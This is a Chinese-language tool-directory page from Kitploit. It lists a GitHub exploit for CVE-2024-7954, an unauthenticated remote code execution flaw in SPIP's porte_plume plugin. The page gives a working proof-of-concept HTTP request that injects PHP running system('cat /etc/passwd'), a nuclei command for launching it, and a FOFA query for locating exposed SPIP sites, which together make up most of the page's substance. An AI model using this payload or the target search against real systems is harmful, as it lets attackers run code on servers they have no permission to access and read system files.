Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-7954-RCE — SPIP 4.2.12及更早版本中的未认证远程代码执行漏洞 | Kitploit
工具/GitHubGitHub/gh-ost00/cve-2024-7954-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubgh-ost00/cve-2024-7954-rce

CVE-2024-7954-RCE

SPIP 4.2.12及更早版本中的未认证远程代码执行漏洞

查看仓库
9232年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

描述

SPIP 4.30-alpha2、4.2.13 和 4.1.16 之前版本使用的 porte_plume 插件存在任意代码执行漏洞。远程未认证攻击者可通过发送特制的 HTTP 请求,以 SPIP 用户身份执行任意 PHP 代码。

漏洞利用(概念验证)

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

使用方法

root@kitploit:~
nuclei --target {host.com} -t CVE-2024-7954.yaml

FOFA 查询

root@kitploit:~
app="SPIP"

参考

  • https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html
  • https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/
  • https://vulncheck.com/advisories/spip-porte-plume
  • https://nvd.nist.gov/vuln/detail/CVE-2024-7954
  • https://security-tracker.debian.org/tracker/CVE-2024-7954
下载工具